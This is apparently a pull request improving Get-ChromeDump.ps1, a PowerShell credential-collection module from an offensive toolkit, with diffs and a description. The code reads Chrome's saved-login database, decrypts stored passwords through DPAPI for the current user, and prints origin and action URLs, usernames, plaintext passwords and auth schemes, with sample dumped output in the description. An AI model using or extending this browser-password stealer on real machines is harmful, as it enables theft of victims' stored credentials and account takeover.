### PR TITLE
Improve ChromeDump

### DIFF
--- a/data/module_source/collection/Get-ChromeDump.ps1
+++ b/data/module_source/collection/Get-ChromeDump.ps1
@@ -192,7 +192,7 @@ Function Get-ChromeDump{
     
     if(!($OutFile)){
       "[*]CHROME PASSWORDS`n"
-      $logins | Format-Table ORIGIN_URL, ACTION_URL, PWD, USER, SCHEME -Wrap | Out-String
+      $logins | Format-List ORIGIN_URL, ACTION_URL, PWD, USER, SCHEME | Out-String
 
       "[*]CHROME HISTORY`n"
 

--- a/data/module_source/collection/Get-ChromeDump.ps1
+++ b/data/module_source/collection/Get-ChromeDump.ps1
@@ -139,18 +139,25 @@ Function Get-ChromeDump{
 
       $logins = @()
 
+      # https://github.com/adobe/chromium/blob/master/webkit/forms/password_form.h#L45-L50
+      $scheme_enum = @{0 = "HTML";1 = "BASIC";2 = "DIGEST"; 3 = "OTHER"}
+
       Write-Verbose "Parsing results of query $query"
 
       $dataset.Tables | Select-Object -ExpandProperty Rows | ForEach-Object {
         $encryptedBytes = $_.password_value
         $username = $_.username_value
-        $url = $_.action_url
+        $action_url = $_.action_url
+        $origin_url = $_.origin_url
+        $scheme = $scheme_enum[[int]$_.scheme]
         $decryptedBytes = [Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [Security.Cryptography.DataProtectionScope]::CurrentUser)
         $plaintext = [System.Text.Encoding]::ASCII.GetString($decryptedBytes)
         $login = New-Object PSObject -Property @{
-          URL = $url
+          ORIGIN_URL = $origin_url
+          ACTION_URL = $action_url
           PWD = $plaintext
-          User = $username 
+          USER = $username
+          SCHEME = $scheme
         }
 
         $logins += $login
@@ -185,7 +192,7 @@ Function Get-ChromeDump{
     
     if(!($OutFile)){
       "[*]CHROME PASSWORDS`n"
-      $logins | Format-Table URL,User,PWD -AutoSize | Out-String
+      $logins | Format-Table ORIGIN_URL, ACTION_URL, PWD, USER, SCHEME -Wrap | Out-String
 
       "[*]CHROME HISTORY`n"
 


### PR DESCRIPTION
Hi!

The three main modifications are : 
- Replace `Format-Table` by `Format-List` in order to pretty-print the output
- Add `ORIGIN_URL` , because for http basic auth `ACTION_URL ` is empty
- Add `SCHEME` to show the auth type ([extract from Webkit' sources](https://github.com/adobe/chromium/blob/master/webkit/forms/password_form.h#L45-L50))

Example :
```
[*]CHROME PASSWORDS

ORIGIN_URL : https://www.facebook.com/login.php
ACTION_URL : https://www.facebook.com/login.php
PWD        : verylongpasswordisverylongverylongpasswordisverylong
USER       : verylongusernameisverylong@verylongtldisverylong.com
SCHEME     : HTML

ORIGIN_URL : https://basic.auth.redacted.com/
ACTION_URL :
PWD        : 8asicHttpP@ssw0rd
USER       : admin
SCHEME     : BASIC          
```

TPWSOS :sunflower: 